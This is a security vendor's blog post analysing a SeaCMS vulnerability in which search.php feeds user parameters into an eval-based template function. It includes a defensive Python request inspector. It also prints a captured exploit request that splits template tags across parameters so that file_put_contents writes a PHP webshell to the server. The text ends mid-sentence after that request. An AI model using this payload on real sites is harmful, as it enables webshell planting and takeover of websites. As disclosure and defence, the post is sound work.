Summary
Recently, one of our security hosting customers reported that their server had been attacked: hackers had uploaded a webshell and tampered with the content of the web pages. After we installed the Cloud Lock protection software for the customer, we intercepted a 0day vulnerability in SeaCMS (Ocean CMS). SeaCMS is a video-on-demand system designed for webmasters with different needs, and it has a high market share among film and television CMSes. Its official address is: http://www.seacms.net/
Several old vulnerabilities in SeaCMS and how they were fixed
In February 2017, an unauthenticated (front-end) getshell vulnerability was disclosed in SeaCMS 6.45; see http://blog.csdn.net/qq_/article/details/76595817 for details. The vulnerability exists because search.php does not filter user input, so the order parameter submitted by the attacker reaches the parseif function, which executes eval. The official fix in version 6.46 filtered the user-supplied parameters and limited each one to 20 characters. However, this fix did not completely resolve the vulnerability: several user-supplied parameters are concatenated during the template replacement step, so the patch could be bypassed. On August 7 the vendor released version 6.54 to fix the vulnerability again. This fix added one line:
$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";
In other words, the order parameter may now only take one of a few fixed values, which blocks attacks through the order parameter but does not solve the problem of the other parameters reaching the parseif function.
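As an added example (not the vendor's code and not the Cloud Lock rule), a small request inspector in Python that models the explanation above: it checks each search parameter for template syntax on its own, then re-checks the concatenation of all parameters, which is the path a per-parameter filter such as the 6.46 patch misses, and applies the 6.54 allowlist to order. The parameter names are taken from the page; their order in the list and its completeness are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Search parameters that search.php substitutes into its template (names from
# the page; the order and completeness of this list are an assumption).
SEARCH_PARAMS = ("searchword", "searchtype", "year", "area", "letter",
                 "yuyan", "jq", "ver", "order")
# Values the 6.54 patch allows for `order` (empty string is the patch's default).
ORDER_ALLOWLIST = ("commend", "time", "hit", "")
# Template syntax that should never come from a user: a {searchpage:NAME}
# substitution tag or the opening of a parseif {if ...} block.
TAG_RE = re.compile(r"\{\s*(?:if\b|searchpage:)", re.IGNORECASE)
IF_BLOCK_RE = re.compile(r"\{\s*if\b.*?\}", re.IGNORECASE | re.DOTALL)


def inspect_search_request(body):
    """Return (blocked, reasons) for a urlencoded POST body sent to search.php."""
    form = parse_qs(body, keep_blank_values=True)
    values = {name: form.get(name, [""])[0] for name in SEARCH_PARAMS}
    reasons = []
    # Rule 1: a template tag inside any single parameter value.
    for name, value in values.items():
        if TAG_RE.search(value):
            reasons.append(f"template tag in parameter '{name}'")
    # Rule 2: the bypass described above. Even when every value passes a
    # per-parameter check (or a 20-character limit), the values are joined
    # during template replacement, so the concatenation must be checked too.
    joined = "".join(values[name] for name in SEARCH_PARAMS)
    if IF_BLOCK_RE.search(joined):
        reasons.append("parseif {if ...} block formed by concatenating parameters")
    # Rule 3: the allowlist the 6.54 patch applies to `order`.
    if values["order"] not in ORDER_ALLOWLIST:
        reasons.append("order value outside allowlist")
    return (bool(reasons), reasons)


# Constructed sample bodies (not the captured attack) for a quick self-check.
BENIGN = "searchword=batman&searchtype=5&order=time"
SPLIT = "searchword=%7Bi&year=f%201%3D%3D1%7D"  # '{i' + 'f 1==1}' -> '{if 1==1}'
BAD_ORDER = "searchword=x&order=foo"

if __name__ == "__main__":
    for body in (BENIGN, SPLIT, BAD_ORDER):
        print(body, "->", inspect_search_request(body))
```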
Analysis of the SeaCMS 0day vulnerability
The attack payload we captured is as follows:
POST /search.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1317
Connection: keep-alive
Upgrade-Insecure-Requests: 1
searchword={if{searchpage:year}&searchtype=5&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=file_p&9[]=ut_contents('./data/cache/wee.&9[]=php',base&9[]=64_decode('...'));ec&9[]=ho(md5(123));exit;
As you can see, attack
Posted on October 17, 2017 at 4:29 PM by admin, in: Web Security